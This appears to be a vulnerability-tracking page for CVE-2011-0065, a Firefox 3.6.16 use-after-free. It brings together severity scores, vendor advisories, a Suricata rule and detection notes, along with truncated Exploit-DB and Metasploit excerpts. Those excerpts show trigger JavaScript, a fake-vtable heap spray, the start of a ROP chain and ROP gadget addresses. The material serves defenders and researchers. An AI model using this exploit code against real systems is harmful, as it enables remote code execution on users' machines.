CVE-2011-0065
published 2011-05-07CVE-2011-0065: Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute…
PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
73.66%
99.4th percentile
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Affected
150 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.5.18 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandfakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); fakeobject.onChannelRedirect(null,new Object,0);↗
bytes↗
fakevtable = unescape("\x00%u1000")bytes↗
var filler = unescape("%u001c%u1000")- →Trigger method: exploit calls QueryInterface(nsIChannelEventSink) then onChannelRedirect(null, new Object, 0) on an OBJECT element to free mChannel, creating a dangling pointer reused via the data attribute. ↗
- →Exploit delivery is via a browser drive-by: the server responds with Content-Type: text/html containing the exploit JavaScript targeting Firefox 3.6.16 User-Agent. ↗
- →User-Agent filtering: the exploit checks for 'Intel Mac OS X 10.6' and 'Firefox/3.6.16' in the User-Agent header; requests not matching are dropped. Monitor for these UA strings in web server logs combined with exploit delivery. ↗
- →Heap spray uses 0x0c0c0c0c sled pattern; the fake vtable pointer is placed at 0x10000000 (unescape('\x00%u1000')) and the ROP pivot targets 0x0c0c0048 as the start address. ↗
- →DEP bypass ROP chain uses xul.dll gadget at 0x1052c871 (mov esp,[ecx]) and kernel32 VirtualProtect at 0x7c801ad4; presence of these ROP gadget addresses in memory or network traffic is a strong indicator. ↗
- →Windows 7 variant uses JAVA 6 and below to bypass ASLR; monitor for Firefox 3.6.16 + Java 6 co-execution with suspicious OBJECT element manipulation. ↗
- →Post-exploitation: Metasploit module sets InitialAutoRunScript to 'migrate -f', meaning the payload immediately migrates processes after execution; look for unexpected process spawning from Firefox. ↗
- ·The Metasploit OSX module targets only Firefox 3.6.16 on Mac OS X 10.6.x (10.6.6, 10.6.7, 10.6.8) and 10.7.x (10.7.2, 10.7.3); the fake vtable addresses (Fakevtable: 0x2727, Fakefunc: 0x2727001c) are hardcoded for x86 OSX targets and will not work on other platforms. ↗
- ·The Windows XP SP3 ROP chain uses a jmp-esp gadget at 0x1003876B (xul.dll) and VirtualProtect at 0x7c801ad4 (kernel32); these addresses are version/patch-level specific and will differ on other Windows builds. ↗
- ·The Windows 7 variant (exploit-db 17672) uses a different ROP chain sourced from MSVCR71.dll; gadget addresses (e.g. 0x7c346c0a, 0x7c37a140) are specific to that DLL version. ↗
- ·JavaScript variable names used in the exploit are randomized at runtime (rand_text_alpha), so static string matching on variable names will not reliably detect this exploit. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
vendor_ubuntu10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j27m-p5vq-3f4g: Use-after-free vulnerability in Mozilla Firefox before 3
ghsa_unreviewed·2022-05-03
CVE-2011-0065 [HIGH] GHSA-j27m-p5vq-3f4g: Use-after-free vulnerability in Mozilla Firefox before 3
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Ubuntu
Thunderbird regression
vendor_ubuntu·2011-06-06·CVSS 10.0
[CRITICAL] Thunderbird regression
Title: Thunderbird regression
Summary: An empty menu bar sometimes appeared after upgrade in USN-1122-2
USN-1122-2 fixed vulnerabilities in Thunderbird on Ubuntu 11.04. A
regression was introduced which caused Thunderbird to display an empty menu
bar. This update fixes the problem. We apologize for the inconvenience.
Original advisory details:
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer disc
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2011-05-05·CVSS 10.0
CVE-2011-0065 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Thunderbird could be made to run programs as your login if it opened
specially crafted mail.
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a certain
types of documents. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0070)
Bob Clary, Henri Siv
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2011-05-05·CVSS 10.0
CVE-2011-0065 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Thunderbird could be made to run programs as your login if it opened
specially crafted mail.
USN-1122-1 fixed vulnerabilities in Thunderbird for Lucid and Maverick.
This update provides the corresponding fixes for Natty.
Original advisory details:
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a cer
Ubuntu
Xulrunner vulnerabilities
vendor_ubuntu·2011-04-30
CVE-2011-0077 Xulrunner vulnerabilities
Title: Xulrunner vulnerabilities
Summary: Multiple xulrunner-1.9.1 vulnerabilities
A large number of security issues were discovered in the Gecko rendering
engine. If a user were tricked into viewing a malicious website, a remote
attacker could exploit a variety of issues related to web browser security,
including cross-site scripting attacks, denial of service attacks, and
arbitrary code execution.
Instructions: After a standard system update you need to restart any applications which
use Xulrunner to make all the necessary changes.
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2011-04-29·CVSS 10.0
CVE-2011-0081 [CRITICAL] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Multiple vulnerabilities in Firefox and Xulrunner
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Firefox. (CVE-2011-0081)
It was discovered that Firefox incorrectly handled certain JavaScript
requests. An attacker could exploit this to possibly run arbitrary code as
the user running Firefox. (CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a certain
types of documents. An attacker could exploit this to possibly run
arbitrary code as the user running Firefox. (CVE-2011-0070)
Bob Clary, Henri Sivonen, Marco Bonardo, Mats Palmgren and Jesse Ruderman
discovered several memo
Red Hat
Mozilla mChannel use after free (MFSA 2011-13)
vendor_redhat·2011-04-28·CVSS 10.0
CVE-2011-0065 [CRITICAL] CWE-416 Mozilla mChannel use after free (MFSA 2011-13)
Mozilla mChannel use after free (MFSA 2011-13)
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Suricata
ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt
suricata·2011-08-18
CVE-2011-0065 ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt
ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt"; flow:established,to_client; file.data; content:"QueryInterface|28|Components.interfaces.nsIChannelEventSink|29|"; fast_pattern; nocase; content:"onChannelRedirect|28|null"; nocase; distance:0; reference:url,www.mozilla.org/security/announce/2011/mfsa2011-13.html; reference:bid,47635; reference:cve,2011-0065; classtype:attempted-user; sid:2013417; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_08_18, cve CVE_2011_0065, deployment Perimeter, co
Exploit-DB
Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)
exploitdb·2012-01-17
CVE-2011-0065 Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)
Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::MAC_OSX,
:javascript => true,
:rank => NormalRanking,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
O
Exploit-DB
Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free
exploitdb·2011-08-16
CVE-2011-0065 Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free
Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free
---
Mozilla mChannel Object use after free
- Found by regenrecht
- MSF exploit by Rh0
- Win 7 fun version by mr_me
function trigger(){
alert('ready?');
fakeobject = document.getElementById("d"); // allocate the object
fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
fakeobject.onChannelRedirect(null,new Object,0); // free it
/*
fill the object with a fake vtable reference
just use the start of a block for simplicity and use \x00
because it expands to a NULL so that
when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
*/
fakevtable = unescape("\x00%u1000");
var rop = "";
// 3 instructions to pivot cleanly
rop += unescape("%u1
Exploit-DB
Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)
exploitdb·2011-08-10
CVE-2011-0065 Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)
Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)
---
##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in
Exploit-DB
Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)
exploitdb·2011-08-05
CVE-2011-0065 Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)
Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)
---
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). This module uses heapspray
with a minimal ROP chain to bypass
Metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free
metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free
Mozilla Firefox 3.6.16 mChannel Use-After-Free
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
Metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
This module exploits a use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay, a windows 7 target was provided using JAVA 6 and below to avoid aslr.
http://downloads.avaya.com/css/P8/documents/100144158http://securityreason.com/securityalert/8326http://securityreason.com/securityalert/8331http://securityreason.com/securityalert/8340http://www.debian.org/security/2011/dsa-2227http://www.debian.org/security/2011/dsa-2228http://www.debian.org/security/2011/dsa-2235http://www.mandriva.com/security/advisories?name=MDVSA-2011:079http://www.mozilla.org/security/announce/2011/mfsa2011-13.htmlhttps://bugzilla.mozilla.org/show_bug.cgi?id=634986https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14142http://downloads.avaya.com/css/P8/documents/100144158http://securityreason.com/securityalert/8326http://securityreason.com/securityalert/8331http://securityreason.com/securityalert/8340http://www.debian.org/security/2011/dsa-2227http://www.debian.org/security/2011/dsa-2228http://www.debian.org/security/2011/dsa-2235http://www.mandriva.com/security/advisories?name=MDVSA-2011:079http://www.mozilla.org/security/announce/2011/mfsa2011-13.htmlhttps://bugzilla.mozilla.org/show_bug.cgi?id=634986https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14142
2011-05-07
Published